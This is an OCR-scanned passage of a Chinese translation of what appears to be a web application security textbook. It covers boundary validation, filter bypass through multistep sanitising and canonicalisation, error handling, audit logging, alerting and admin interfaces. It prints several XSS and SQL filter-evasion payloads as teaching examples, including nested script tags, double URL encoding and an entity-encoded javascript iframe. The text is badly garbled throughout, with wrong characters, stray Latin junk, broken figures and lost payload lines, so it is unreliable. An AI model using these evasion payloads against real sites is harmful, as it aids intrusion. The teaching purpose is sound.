这 种 方法 并 不 适用 于 Web 应 用 程序 需要 执行 的 每 项 任务 ， 但 如 果 适 
用 ， 它 是 一 各 有效 处 理 潜在 恶意 输入 的 通用 方法 。 

5. 语法 检查 

迄今 为 止 ， 本 书 描 述 的 防御 措施 全 都 用 于 防止 应 用 程序 接受 各 种 错 
误 的 输入 ， 攻 击 者 专门 设计 这 些 输入 的 内 容 以 干扰 应 用 程序 的 处 理 过 
程 。 然 而 ， 在 一 些 漏洞 中 ， 攻 击 者 提交 的 输入 与 普通 的 非 恶 意 用 户 提 交 
的 输入 完全 相同 。 之 所 以 称 其 为 恶意 输入 ， 是 因为 攻击 者 提交 的 动机 不 
同 。 例 如 ， 攻 击 者 可 能 会 修改 通过 隐藏 表单 字段 提交 的 账号 ， 企 图 访问 
其 他 用 户 的 银行 账户 。 这 时 ， 再 多 的 语法 确认 也 无 法 区 别 用 户 与 攻击 者 
的 数据 。 为 防止 未 授权 访问 ， 应 用 程序 必须 确认 所 提交 的 账号 属于 之 前 
提交 该 账号 的 用 户 。 












































2.2.3 IA 


在 信任 边界 确认 数据 的 做 法 并 不 少见 。 用 户 提 交 的 数据 不 可 信和 是 造 
成 Web 应 用 程序 核心 安全 问题 的 主要 原因 。 虽 然 在 客户 端 执行 的 输入 确 
认 检 查 可 以 提高 性 能 ， 改 善 用 户 体 验 ， 但 它们 并 不 能 为 实际 到 达 服 务 器 
的 数据 提供 任何 保证 。 服 务 右 端 应 用 程序 第 一 次 收 到 用 户 数据 的 地 方 是 
一 个 重要 的 信任 边界 ， 应 用 程序 需要 在 此 采取 措施 防御 恶意 输入 。 

鉴于 核心 问题 的 本 质 ， 可 以 基于 因特网 (“不 民 ” 且 不 可 信 ) 与 服务 
amin DQ Bere CORRS” BTR) 之 间 的 边界 来 考虑 输入 确认 问题 。 从 这 
个 角度 看 ， 输 入 确认 的 任务 惑 是 净化 到 达 的 潜在 恶意 数据 ， 然 后 将 * 洁 
净 的 ”数据 提交 给 可 信 的 应 用 程序 。 此 后 ， 数 据 即 属 于 可 信 数 据 ， 不 需 
要 任何 进一步 的 检查 或 担心 可 能 的 攻击 ， 即 可 进行 处 理 。 

很 明显 ， 当 我 们 开始 分 析 一 些 实际 的 漏洞 时 ， 执 行 这 种 简单 的 输入 
确认 是 不 够 的 ， 原 因 如 下 。 

口 基 于 应 用 程序 所 执行 功能 的 广泛 性 以 及 其 所 采用 技术 的 多 样 性 ， 
一 个 典型 的 应 用 程序 需要 防御 大 量 各 种 各 样 的 基于 输入 的 攻击 ， 且 每 种 
攻击 可 能 采用 一 组 截然 不 同 的 专门 设计 的 数据 。 因 此 ， 很 难 在 外 部 边界 
建立 一 个 单独 的 机 制 ， 防 御所 有 这 些 攻 击 。 

口 许 多 应 用 程序 功能 都 涉及 组 合 一 系列 不 同类 型 的 处 理 过 程 。 用 户 
提交 的 一 项 输入 可 能 会 在 不 同 的 组 件 中 引发 许多 操作 ， 其 中 前 一 个 操作 
的 输出 结果 被 用 于 后 一 个 操作 的 输入 。 

数据 发 生 转 换 后 ， 可 能 会 变 得 与 原始 的 输入 完全 不 同 。 而 经 验 丰 富 
的 攻击 者 能 够 操纵 应 用 程序 ， 在 关键 处 理 阶段 生成 恶意 输入 ， 攻 击 接 收 
这 些 数据 的 组 件 。 为 此 ， 很 难 在 外 部 边界 执行 确认 机 制 ， 预 测 每 一 个 用 
户 输 入 的 全 部 可 能 处 理 结果 。 

口 防御 不 同类 型 的 基于 输入 的 攻击 可 能 需要 对 相互 矛盾 的 用 户 输入 
执行 各 种 确认 检查 。 例 如 ， 防 止 路 站 点 脚本 攻击 可 能 需要 将 > 字符 
HTML 编 码 为 &lt;， 而 防止 命令 注入 攻击 则 需要 阻止 包含 & 与 ;字符 的 
输入 。 有 时 候 ， 想 要 在 应 用 程序 的 外 部 边界 同时 阻止 所 有 类 型 的 攻击 几 
乎 是 不 可 能 的 事情 。 

边界 确认 Cboundary validation) 是 一 种 更 加 有 效 的 模型 。 此 时 ， 服 
务 器 问 应 用 程序 的 每 一 个 单独 的 组 件 或 功能 单元 将 其 输入 当做 来 自 湾 在 
恶意 来 源 的 输入 对 待 。 除 客户 端 与 服务 器 之 间 的 外 部 边界 外 ， 应 用 程序 
在 上 述 每 一 个 信任 边界 上 执行 数据 确认 。 这 种 模型 为 前 面 提出 的 问题 提 
供 了 一 个 解决 方案 。 每 个 组 件 都 可 以 防御 它 收 到 的 特殊 类 型 的 专门 设计 
的 输入 。 当 数据 通过 不 同 的 组 件 时 ， 即 可 对 前 面 转换 过 程 中 生成 的 任意 
数据 值 执行 确认 检查 。 而 且 ， 由 于 在 不 同 的 处 理 阶 段 执行 不 同 的 确认 检 
查 ， 它 们 之 间 不 可 能 发 生 冲 突 。 

图 2-5 说 明了 一 种 典型 情况 ， 此 时 边界 确认 是 防御 恶意 输入 的 最 有 


























效 方法 。 在 用 户 登 录 过 程 中 ， 需 要 对 用 户 提 交 的 输入 进行 几 个 步骤 的 处 
理 ， 并 在 每 个 步骤 执行 适当 的 确认 检查 。 


| (2) 洁净 的 SQL | 


] SQL 查询 3 
提交 登录 信息 —— E 
> Tay? 
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: (1) 常规 检查 | 


(3) 编码 XML 
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SOAP 服 务 
图 2-5 “一 种 在 多 阶段 处 理 步 又 中 使 用 边界 确认 的 应 用 程序 功能 












































C1) 应 用 程序 收 到 用 户 的 登录 信息 。 表 单 处 理 程序 确认 每 个 输入 
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(2) 应 用 程序 执行 一 个 SQL 碍 询 检 验 用 户 证书 。 为 防止 SQL 注入 
攻击 ， 在 执行 查询 前 ， 应 用 程序 应 对 用 户 输入 中 包含 的 可 用 于 攻击 数据 
库 的 所 有 字符 进行 转 义 。 

(3) 如 果 用 户 成 功 登 录 ， 应 用 程序 再 将 用 户 资 料 中 的 某 些 数据 传 
送 给 SOAP 服 务 ， 进 一 步 获得 用 户 账户 的 有 关 信 息 。 为 防止 SOAP 注 入 攻 
击 ， 需 要 对 用 户 资 料 中 的 任何 XML 元 字符 进行 适当 编码 。 

(4) 应 用 程序 在 用 户 的 浏览 器 中 显示 用 户 的 账户 信息 。 为 防止 跨 
站 点 脚本 攻击 ， 应 用 程序 对 植 入 返回 页 面 的 任何 用 户 提交 的 数据 执行 
HTML 编 码 。 

我 们 将 在 后 续 和 章节 详细 介绍 上 文 描述 的 特殊 漏洞 和 防御 机 制 。 如 果 
这 一 功能 发 生变 化 ， 需 要 同 其 他 应 用 程序 组 件 提 交 数 据 ， 那 么 可 能 需要 
在 相关 信任 边界 执行 类 似 的 防御 。 例 如 ， 如 果 登 录 失 败 致 使 应 用 程序 回 
用 户 发 送 警 告 电子 邮件 ， 那 么 可 能 需要 检查 合并 到 电子 邮件 中 的 所 有 用 
户 数据 ， 防 止 SMTP 注 入 攻击 。 

















2.2.4 步 确认 与 规范 


在 确认 检查 过 程 中 ， 当 需要 在 几 个 步骤 中 处理 用 户 提 交 的 输入 时 ， 
就 会 出 现 一 个 输入 处 理 机 制 经 常 遇 到 的 问题 。 如 果 不 谨慎 处 理 这 个 过 
程 ， 那 么 攻击 者 就 能 够 建立 专门 设计 的 输入 ， 使 恶意 数据 成 功 避 开 确 认 
机 制 。 当 应 用 程序 试图 通过 删除 或 编码 某 些 字符 或 表达 式 疤 化 用 户 输入 
时 ， 就 会 出 现 这 种 问题 。 例 如 ， 为 防御 某 些 跨 站 点 脚本 攻击 ， 应 用 程序 
可 能 会 从 任何 用 户 提 交 的 数据 中 删除 表达 式 : 

<script> 

但 攻击 者 可 通过 应 用 以 下 输入 避 开 过 滤器 : 

<scr<script>ipt> 

由 于 过 滤 无 法 递归 运行 ， 删 除 被 阻止 的 表达 式 后 ， 表 达 式 周围 的 数 
据 又 合并 在 一 起 ， 重 新 建立 恶意 表达 式 。 

同样 ， 如 果 对 用 户 输 入 执行 几 个 确认 步 又 ,攻击 者 就 可 以 利用 这 些 
步骤 的 顺序 来 避 开 过 滤 。 例 如 ， 如 有 果 应 用 程序 首先 递归 删除 .\， 然 后 递 
归 删 除 .\， 就 可 以 使 用 以 下 输入 避 开 确认 检查 : 





r,s 


数据 规范 化 (data canonicalization) 会 造成 另 一 个 问题 。 当 用 户 浏 
览 右 送出 输入 时 ， 它 可 对 这 些 输入 进行 各 种 形式 的 编码 。 之 所 以 使 用 这 
些 编码 方案 ， 是 为 了 能 够 通过 HTTP 安 全 传送 不 常见 的 字符 与 二 进 制 数 
据 〈( 请 参阅 第 3 章 了 解 更 多 详情 ) 。 规 范 化 是 指 将 数据 转换 或 解码 成 一 
个 常见 字符 集 的 过 程 。 如 果 在 实施 输入 过 小 之 后 才 执 行规 范 化 ， 那 么 攻 
击 者 就 可 以 通过 使 用 编码 避 开 确认 机 制 。 

例如 ， 应 用 程序 可 能 会 从 用 户 输入 中 删除 省 略 号 ， 以 防止 菜 些 SQL 
注入 攻击 。 但 是 ， 如 果 应 用 程序 随后 对 净化 后 的 数据 进行 规范 化 ， 那 么 
攻击 者 就 可 以 使 用 URL 编 码 的 输入 避 开 确认 : 


%2527 


ge ee Ee nee 
DEA: 








%27 


其 中 并 不 包含 省 略 号 ， 因 此 ， 应 用 程序 的 过 滤器 允许 该 输入 。 但 
是 ， 如 果 应 用 程序 执行 进一步 的 URL 解 码 ， 该 输入 将 变 为 省 略 号 ， 从 而 


避 开 过 小 。 
如 果 应 用 程序 删除 而 不 是 阻止 省 略 号 ， 然 后 执行 进一步 的 规范 化 ， 
则 可 以 使 用 以 下 输入 避 开 过 滤 : 


名和 2727 

值得 注意 的 是 ， 在 这 些 情 况 下 ， 应 用 程序 服务 需 端 不 一 定 会 执行 多 
步 确认 和 规范 化 。 例 如 ， 在 下 面 的 输入 中 ， 几 个 字符 已 被 HTML 编 码 : 

<iframe src=j&#x61;vasc&#x72ipt&#xja;alert&#x28;1&#x29; > 

如 果 服 务 器 端 应 用 程序 使 用 输入 过 滤 来 阻止 菜 些 JavaScript 表 达 式 和 
人 字符， 该 已 编码 的 输入 残 可 以 成 功 避 开 过 小 。 但 是 ， 如 果 该 输入 随后 说 
复制 到 应 用 程序 的 啊 应 中 ， 某 些 浏览 器 将 对 src 参 数值 执行 HTML 解码 ， 
贷 入 的 JavaScript 将 得 以 执行 。 

除了 供 Web 应 用 程序 使 用 的 标准 编码 方案 外 ， 其 他 情况 下 ， 如 宋 应 
用 程序 米 用 的 组 件 将 数据 从 一 个 字符 集 转换 为 为 一 个 字符 集 ， 这 也 会 导 
致 规范 化 问题 。 例 如 ， 茶 些 技术 会 基于 印刷 字形 的 相似 性 ， 对 字符 执 
行 “ 最 佳 " 映 射 。 这 时 ， 字 符 《 和 》 分 别 被 转换 为 < 和 >， 立 和 A 则 被 转换 
为 Y 和 A。 攻 击 者 经 常 利用 这 种 方法 传送 受阻 止 的 字符 或 关键 字 ， 从 而 
避 开 应 用 程序 的 输入 过 滤 。 

本 书 将 详细 介绍 这 类 攻击 ， 它 们 可 有 效 挫败 应 用 程序 针对 和 常见 的 基 
于 输入 的 漏洞 而 采取 的 许多 防御 机 制 。 

有 了 时候， 可 能 很 难 避 免 多 步 确 认 与 规范 化 造成 的 问题 ， 也 不 存在 解 
决 这 类 问题 的 唯一 方 采 。 一 种 解决 办 法 是 递归 执行 滔 化 操作 ， 直 到 无 法 
进一步 修改 输入 。 然 而 ， 如 果 雷 要 在 净化 过 程 中 对 一 个 存在 疑问 的 字符 
进行 转 义 ， 那 么 这 种 情况 可 能 会 造成 无 限 循 环 。 通 党 ， 这 个 问题 只 有 根 
据 具 体 情况 、 基 于 所 执行 的 确认 类 型 加 以 解决 。 如 果 可 能 ， 最 好 避免 净 
化 茶 些 不 民 输 入 的 做 法 ， 完 全 拒绝 这 种 类 型 的 输入 。 














2.3 ”处 理 攻 击 者 


任何 设计 安全 应 用 程序 的 开发 人 员 必 须 基于 这 样 一 个 假设 : 应 用 程 
序 将 成 为 蓄意 破坏 且 经 验 丰 富 的 攻击 者 的 直接 攻击 目标 。 能 够 以 受 控 的 
方式 处 理 并 应 对 这 些 攻 击 ， 是 应 用 程序 安全 机 制 的 一 项 主要 功能 。 这 些 
机 制 通常 结合 使 用 一 系列 防御 与 攻击 措施 ， 以 尽 可 能 地 阻止 攻击 者 ， 并 
就 所 发 生 的 事件 ， 通 知 应 用 程序 所 有 者 以 及 提供 相应 的 证 据 。 为 处 理 攻 
击 者 而 采取 的 措施 一 般 由 以 下 任务 组 成 : 

口 处 理 错 误 ; 

口 维护 审计 日 志 ; 

口 问 管理 员 发 出 警报 ; 

口 应 对 攻击 。 


2.3.1 人 处理 错 误 


不 管 应 用 程序 开发 者 在 确认 用 户 输入 时 多 么 小 心 ， 还 是 几乎 可 以 肯 
定 会 出 现 一 些 无 法 预料 的 错误 。 功 能 与 用 己 验 收 测试 过 程 能 够 碍 明 普 通 
用 户 行 为 造成 的 错误 ， 在 生产 环境 中 部 署 应 用 程序 前 应 当 考 虑 到 这 一 因 
素 。 然 而 ， 我 们 无 法 预测 恶意 用 户 与 应 用 程序 交互 的 每 一 种 可 能 方式 ， 
并 且 当 应 用 程序 遭受 攻击 时 肯定 会 出 现 其 他 错误 。 

应 用 程序 的 一 个 关键 防御 机 制 是 合理 地 处 理 无 法 预料 的 错误 ， 要 么 
纠正 这 些 错误 ， 要 么 同 用 户 发 送 适当 的 错误 消 轧 。 在 生产 环境 下 ， 应 用 
程序 不 应 在 其 啊 应 中 返回 任何 系统 生成 的 消息 或 其 他 调试 信息 。 过 于 详 
细 的 错误 消 奶 非常 有 利于 恶意 用 户 回 应 用 程序 发 动 进一步 攻击 。 有 些 情 
况 下 ， 攻 击 者 能 够 利用 存在 缺陷 的 错误 处 理 方法 从 错误 消息 中 获得 敏感 
言 轧 ;此 时 ， 错 误 消 息 成 为 攻击 者 从 应 用 程序 中 狗 取 数据 的 重要 渠道 。 
图 2-6 显 示 了 一 个 由 无 法 处 理 的 错误 生成 的 过 于 详细 的 错误 消息 。 
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多 2-6 一 个 无 法 处 理 的 错误 


大 多 数 Web 开 发 语言 通过 try-catch 块 和 受 碍 异常 提供 良好 的 错误 处 
理 文 持 。 应 用 程序 代码 应 广泛 使 用 这 些 方法 查 明 特 殊 与 常规 错误 ， 并 做 
出 相应 处 理 。 而 且 ， 还 可 以 配置 大 多 数 应 用 程序 服务 器 ， 使 其 以 目 定 义 
的 方式 处 理 无 法 处 理 的 应 用 程序 错误 ， 如 提供 不 包含 太 多 信息 的 错误 消 
恩 。 请 参阅 第 15 章 了解 有 关 这 些 措施 的 更 多 详情 。 

有 效 的 错误 处 理 措 施 通 常 与 应 用 程序 的 日 志 机 制 整合 在 一 起 ， 后 者 
尽 可 能 地 记录 与 无 法 预料 的 错误 有 关 的 调试 信息 。 通 常 ， 无 法 预料 的 错 
误 往 往 能 够 指明 应 用 程序 的 防御 机 制 中 存在 的 缺陷 。 如 果 应 用 程序 的 所 
有 者 获得 必要 的 信息 ， 就 能 从 源头 解决 这 些 问 题 。 


2.3.2 ”维护 审计 日 志 











审计 日 志 Caudit log) 在 调查 针对 应 用 程序 的 入 侵 和 尝试 时 会 发 挥 很 
大 作用 。 发 生 入 侵 后 ， 有 效 的 审计 日 志 功 能 应 能 够 帮助 应 用 程序 所 有 者 
了 解 实际 发 生 的 情况 ， 如 哪些 漏洞 《如 果 有 ) 被 加 以 利用 ， 攻 击 者 是 否 
可 以 对 数据 进行 非法 访问 或 执行 任何 未 授权 的 操作 ， 并 尽 可 能 地 提供 侵 





入 者 的 身份 信息 。 

在 任何 注重 安全 的 应 用 程序 中 ， 日 志 应 记录 所 有 重要 事件 。 一 般 这 
些 事件 应 至 少 包 括 以 下 几 项 。 
口 所 有 与 身份 验证 功能 有 关 的 事件 ， 如 成 功 或 失败 的 登录 、 密 码 修 


口 关键 交易 ， 如 信用 卡 支付 与 转账 。 

口 被 访问 控制 机 制 阻止 的 访问 企图 。 

口 任 何 包 含 已 知 攻击 字符 串 ， 公 然 表 明和 恶 意 意图 的 请 求 。 

许多 安全 性 至 关 重要 的 应 用 程序 (如 电子 银行 使 用 的 应 用 程序 ) 会 
oe 出 提出 的 每 一 个 请 求 ， 这 样 可 为 任何 事故 调查 提供 全 面 的 

法 记 采 。 

有 效 的 审计 日 志 马 能 一 般 会 记录 每 个 事件 的 发 生 时 间 、 发 出 请 求 的 
IP 地 址 和 用 户 的 账户 (如 果 通 过 验证 ) 。 这 些 日 志 必 须 受到 严格 保护 ， 
避免 未 授权 的 读 取 或 写 入 访问 。 一 种 有 效 的 保护 方法 是 将 审计 日 志保 存 
在 仅 接受 主 应 用 程序 送出 的 更 新 消息 的 自治 系统 中 。 某 些 情况 下 ， 可 能 
需要 将 日 志 复 制 到 一 次 性 写 入 的 媒质 中 ， 确保 它们 的 完整 性 ， 以 便 在 痢 
受 攻 击 后 进行 调查 。 

在 受 攻击 面 方面 ， 保 护 不 严密 的 审计 日 志 可 能 为 攻击 者 提供 大 量 信 
息 ， 向 其 披露 许多 敏感 信息 ， 如 会 话 令 牌 和 请 求 参数 ， 这 些 信 息 可 能 会 
使 攻击 者 能 够 立即 攻破 整个 应 用 程序 〈 见 图 2-7) 。 
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审计 日 志 可 帮助 应 用 程序 所 有 者 调查 入 侵 企图 ， 如 有 可 能 ， 应 对 侵 
入 者 采取 法 律 行动 。 然 而 ， 许 多 时 候 我 们 希望 立即 采取 行动 ， 实 时 响应 
攻击 企图 。 例 如 ， 管 理 员 可 能 会 阻止 被 攻击 者 利用 的 也 地 址 或 用 户 账 
户 。 在 极端 情况 下 ， 他 们 甚至 可 能 在 调查 攻击 、 采 取 补 救 措施 时 将 应 用 
程序 从 网 络 中 断 开 。 这 时 ， 即 使 攻击 者 已 经 成 功 侵入 应 用 程序 ， 如 果 能 
够 及 时 采取 防御 措施 ， 也 可 以 将 实际 影响 降 到 最 低 。 

许多 时 候 ， 和 警报 机 制 必须 在 两 个 相互 矛盾 的 目标 之 间 取 得 平衡 ， 既 
准确 报告 每 次 的 真实 攻击 ， 叉 不 会 生成 过 多 警报 ， 造 成 它们 被 管理 员 忽 
略 。 精 心 设计 的 报警 机 制 能 够 组 合 各 种 因素 ， 确 定 应 用 程序 正在 划 受 的 
某 种 攻击 ;并 在 可 能 的 情况 下 将 所 有 相关 事件 集中 到 一 个 警报 中 。 和 警报 
监控 的 反常 事件 一 般 包 括 以 下 儿 种 。 
口 应 用 反常 ， 如 收 到 由 单独 一 个 IP 地 址 或 用 户 发 出 的 大 量 请 求 ， 表 
明 应 用 程序 正 受 到 上 自 定义 攻击 。 
口交 易 有 反常 ， 如 单独 一 个 银行 账户 所 转 入 或 转 出 的 资金 数量 出 现 腊 


口 包含 已 知 攻击 字符 串 的 请 求 。 
口 请 求 中 普通 用 户 无 法 查看 的 数据 被 修改 。 
现 有 的 应 用 程序 防火 场 和 入 侵 检测 产品 能 够 相当 完善 地 提供 其 中 一 
些 功能 。 这 些 产 品 一 般 组 合 应 用 一 组 基于 签名 与 异常 的 规则 来 确定 对 应 
用 程序 的 恶意 利用 ， 并 能 够 主动 阻止 恶意 请 求 ， 向 管理 员 发 出 警报 。 这 
些 产 品 构成 保护 Web 应 用 程序 的 一 个 重要 防御 层 ， 当 已 知 现 有 应 用 程序 
存在 漏洞 ， 但 可 用 资源 却 无 法 修复 这 些 漏洞 时 ， 它 们 特别 有 用 。 然 而 ， 
由 于 每 个 web 应 用 程序 都 各 不 相同 ， 这 些 产 品 的 效用 也 往往 受到 限制 ， 
其 采用 的 规则 也 因而 趋 于 一 般 化 。Web 应 用 程序 防火 墙 通常 能 够 确定 最 
明显 的 攻击 ， 在 这 种 攻击 中 ， 攻 击 者 在 每 一 个 请 求 参数 中 提交 标准 的 攻 
击 字 符 串 。 然 而 ， 与 这 种 攻击 相 比 ， 许 多 攻击 往往 更 加 隐蔽 ， 例 如 修改 
隐藏 表单 字段 中 的 账号 来 访问 其 他 用 户 的 数据 ， 或 者 提 区 无 序 请 求 以 利 
用 应 用 程序 逻辑 中 存在 的 缺陷 。 在 这 些 情况 下 ， 攻 击 者 提交 的 请 求 可 能 
与 善意 用 户 提 交 的 请 求 完 全 相同 。 之 所 以 称 为 恶意 请 求 ， 是 因为 提交 请 
求 的 环境 有 所 不 同 。 

在 任何 安全 性 至 关 重 要 的 应 用 程序 中 ， 进 行 实 时 警报 的 最 有 效 方法 
是 将 其 与 应 用 程序 的 输入 确认 机 制 和 其 他 控制 方法 紧密 结合 起 来 。 例 
如 ， 如 果 认 为 cookie 中 包含 一 组 特殊 值 中 的 某 个 值 ， 那 么 任何 违反 这 种 
情况 的 现象 即 表明 该 值 已 被 修 改 ， 而 且 应 用 程序 的 普通 用 户 无 法 执行 此 
类 修改 。 同 样 ， 如 果 一 名 用 户 修 改 隐藏 表单 字段 中 的 账号 ， 以 确定 力 一 
名 用 户 的 账户 ， 这 种 做 法 也 明确 表现 出 恶意 意图 。 应 用 程序 的 主要 防御 
机 制 应 阻止 这 些 攻击 ， 而 且 ， 这 些 保 护 机 制 可 轻易 与 应 用 程序 的 警报 机 
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制 进行 整合 ， 提 供 完全 目 定义 的 恶意 行为 警示 。 因 为 已 经 根据 应 用 程序 
的 实际 逻辑 定制 这 些 检查 ， 如 果 清 楚 了 解 普通 用 户 的 操作 权限 ， 那 么 不 
ee oe ee 
t Hó S o 


2.3.4 应 对 攻击 


除 同 管 理 员 发 出 警报 外 ， 许 多 安全 性 至 关 重 要 的 应 用 程序 还 含有 内 
置 机 制 ， 以 防御 潜在 恶意 用 户 。 

由 于 应 用 程序 各 不 相同 ， 现 实 世 界 中 的 许多 攻击 要 求 攻击 者 系统 地 
探查 应 用 程序 中 存在 的 漏洞 ， 提 交 无 数 包含 专门 设计 的 输入 请 求 ， 以 确 
定 其 中 是 否 存 在 各 种 常见 的 漏洞 。 高 效 的 输入 确认 机 制 能 够 把 许多 这 种 
类 型 的 请 求 确 定 为 潜在 的 恶意 请 求 ， 并 阻止 这 些 输入 ， 防 止 它 们 给 应 用 
程序 造成 任何 不 利 影响 。 然 而 ， 我 们 还 应 意识 到 ， 攻 击 者 仍然 能 够 以 茶 
种 方式 避 开 这 些 过 滤 ; 而 且 ， 应 用 程序 确实 包含 东 些 实际 的 漏洞 ， 等 行 
攻击 者 去 发 现 和 利用 。 从 某 种 意义 上 说 ， 进 行 系统 性 探查 的 攻击 者 可 能 
会 及 现 这 些 缺 陷 。 

有 鉴于 此 ， 一 些 应 用 程序 采取 目 动 反应 措施 阻止 攻击 者 进行 这 种 形 
式 的 探查 ， 例 如 对 攻击 者 提交 的 请 求 的 啊 应 速度 变 得 越 来 越 慢 ， 或 者 终 
止 攻击 者 的 会 话 ， 要 求 其 重新 登录 或 在 继续 攻击 前 执行 其 他 步 又。 虽然 
这 些 措施 无 法 阻挡 最 有 耐心 和 决心 的 攻击 者 ， 但 能 够 阻止 许多 很 随意 的 
ee eS ey ee 
得 时 间 。 

当然 ， 阻 止 显 而 易 见 的 攻击 并 不 如 修复 应 用 程序 中 存在 的 所 有 漏洞 
重要 。 然 而 ， 在 现实 情况 中 ， 即 使 我 们 为 清除 应 用 程序 中 的 安全 缺陷 做 
出 了 不 懈 努 力 ， 仍 然 会 有 一 些 可 供 利用 的 缺陷 存在 。 给 攻击 者 设置 更 多 
阻碍 是 一 种 有 效 的 深层 防御 措施 ， 这 样 做 能 够 降低 任何 残存 的 漏洞 被 发 
现 和 利用 的 可 能 性 。 

















2.4 管理 应 用 程序 


任何 有 用 的 应 用 程序 都 需要 进行 管理 与 维护 ， 这 种 功能 通常 是 应 用 
程序 安全 机 制 的 一 个 重要 组 成 部 分 ， 可 帮助 管理 员 管 理 用 户 账户 与 角 
色 、 应 用 监控 与 审计 功能 、 执 行 诊断 任务 并 配置 应 用 程序 的 各 种 功能 。 

许多 应 用 程序 一 般 通 过 相同 的 Web 界 面 在 内 部 执行 管理 功能 ， 这 也 
古 它 的 核心 非 安全 功能 ， 如 图 2-8 所 示 。 在 这 种 情况 下 ， 管 理 机 制 就 成 
为 应 用 程序 的 主要 受 攻 击 面 。 它 吸引 攻击 者 的 地 方 主要 在 于 它 能 够 提升 
权限 ， 以 下 举例 说 明 。 





DW PHP Nuke Powered Ste Adminiereripn Mens Merits Firefen <b fe) 
Fie fdn View History Bookmarks Toots Help 
-= "© A EEE hemde ne phpaukesdan php -o e 万 


PHP Nuke Powered Site Administra... + 











图 2-8 ”Web 应 用 程序 中 的 管理 界面 




















口 喘 份 验证 机 制 中 存在 的 薄弱 环节 使 攻击 者 能 够 获得 管理 员 权 限 ， 
迅速 攻破 整个 应 用 程序 。 

口 许 多 应 用 程序 并 不 对 它 的 一 些 管理 功能 执行 有 效 的 访问 控制 。 利 
用 这 个 漏洞 ， 攻 击 者 可 以 建立 一 个 拥有 强大 特权 的 新 用 户 账户 。 

口 管理 功能 通 癌 能 够 显示 普通 用 户 提 交 的 数据 。 管 理 界面 中 存在 的 
任何 路 站 点 脚本 缺陷 都 可 能 危及 用 尸 会 话 的 安全 。 

口 因为 管理 用 户 被 视 为 可 信用 户 ， 或 者 由 于 渗透 测试 员 只 能 访问 低 
权限 的 账户 ， 所 以 管理 功能 往往 没有 经 过 严格 的 安全 测试 。 而 且 ， 它 通 
常 需要 执行 相当 人 危险 的 操作 ， 包 括 访 问 磁盘 上 的 文件 或 操作 系统 命令 。 
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尽管 存在 巨大 差异 ， 但 几乎 所 有 的 Web 应 用 程序 都 以 菏 种 形式 采用 
相同 的 核心 安全 机 制 。 这 些 机 制 是 应 用 程序 应 对 恶意 用 户 所 采取 的 主要 
防御 措施 ， 因 而 应 用 程序 的 受 攻击 面 大 部 分 也 由 它们 构成 。 我 们 在 本 书 
后 面 介绍 的 漏洞 也 主要 源 于 这 些 核心 机 制 中 存在 的 缺陷 。 

在 这 些 机 制 中 ， 处 理 用 户 访问 和 用 户 输 入 的 机 制 是 最 重要 的 机 制 。 
当 针 对 应 用 程序 及 动 攻击 时 ， 它 们 将 成 为 主要 攻击 对 象 。 利 用 这 些 机 制 
中 存在 的 缺陷 通常 可 以 完全 攻破 整个 应 用 程序 ， 使 攻击 者 能 够 访问 其 他 
用 户 的 数据 、 执 行 未 授权 操作 以 及 注入 任意 代码 和 命令 。 











2.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.neVywahhD。 
m e 为 什么 说 应 用 程序 处 理 用 户 访问 的 机 制 是 所 有 机 制 中 最 薄弱 
INLEI? 

(2) 会 话 与 会 话 令 牌 有 何不 同 ? 

(3) 为 何不 可 能 始终 使 用 基于 白 名 单 的 方法 进行 输入 确认 ? 

(4) 攻击 者 正在 攻击 一 个 执行 管理 功能 的 应 用 程序 ， 并 且 不 具有 
使 用 这 项 功能 的 任何 有 效 证 书 。 为 何 他 仍然 应 当 密 切 关 注 这 项 功能 呢 ? 

(5) 旨 在 阻止 路 站 点 脚本 攻击 的 输入 确认 机 制 按 以 下 顺序 处 理 一 


个 输入 : 
Ca) 删除 任何 出 现 的 <script> 表 达 式 ; 
Cb) 将 输入 截 短 为 50 个 字符 ; 
Cc) 删除 输入 中 的 引号 ; 
Cd) 对 输入 进行 URL 解 码 ; 
Ce) 如 果 任 何 输入 项 被 删除 ， 返 回 步骤 (1) 。 
是 否 能 够 避 开 上 述 确认 机 制 ， 让 以 下 数据 通过 确认 ? 


"><script>alert("foo")</script> 








山 在 软件 环境 中 ， 受 攻击 面 (attack surface) 是 指 对 未 通过 验证 的 用 户 

的 有 效 功 能 ， 也 就 是 说 ， 未 通过 验证 的 用 户 通过 软件 的 默认 配置 能 够 达 

到 什么 目的 。 一 一 译 者 注 

2 答案 的 中 文 版 请 参阅 图 灵 社 区 本 书页 面 
(http:/www.ituring.com.cn/book/885)， 或 

http://blog.sina.com.cn/s/blog_545eb7860101379s.html。 一 一 译 者 注 











W eb 应 用 程序 使 用 各 种 不 同 的 技术 实现 其 功能 。 本 章 简 要 介绍 渗 
透 测 试 员 在 攻击 web 应 用 程序 时 可 能 遇 到 的 关键 技术 。 我 们 将 分 析 
HTTP 协 议 、 服 务 器 和 客户 端 常 用 的 技术 以 及 用 于 在 各 种 情形 下 呈现 数 
据 的 编码 方案 。 这 些 技术 大 都 简单 易 屏 ， 午 握 其 相关 特性 对 于 加 Web 应 
用 程序 发 动 有 效 攻 击 极其 重要 。 

如 果 读 者 已 经 熟悉 Web 应 用 程序 所 使 用 的 关键 技术 ， 可 以 快速 浏览 
本 章 内 容 ， 确 定 其 中 没有 不 了 解 的 技术 。 如 果 还 在 学 习 Web 应 用 程序 的 
工作 原理 ， 那 么 在 继续 阅读 分 析 特 丈 漏 洞 的 后 续 章 节 前 ， 应 当先 阅读 本 
章 内 容 。 为 了 进一步 学 习 本 书后 续 章 市 涉及 的 内 容 ， 我 们 推荐 读者 阅读 
David Gourley 和 Brian Totty 合 著 的 HTTP: The Definitive Guide 一 书 

(O'Reilly, 2002) ， 也 可 在 万 维 网 联盟 网 站 (www.w3.02g) 上 阅读 电 
子 版 。 





3.1 HTTP 


HTTP (HyperText Transfer Protocol， 超 文本 传输 协议 ) 是 访问 万 维 
网 使 用 的 核心 通信 协议 ， 也 是 今天 所 有 Web 应 用 程序 使 用 的 通信 协议 。 
最 初 ，HITTP 只 是 一 个 为 获取 基于 文本 的 静态 资源 而 开发 的 简单 协议 ， 
后 来 人 们 以 各 种 形式 扩展 和 利用 它 ， 使 其 能 够 文 持 如 今 弟 见 的 复杂 分 
式 应 用 程序 。 

HTTP 使 用 一 种 基于 消息 的 模型 :客户 端 送出 一 条 请 求 消 息 ， 而 后 
由 服务 器 返回 一 条 响应 消息 。 该 协议 基本 上 不 需要 连接 ， 虽 然 HITP 使 
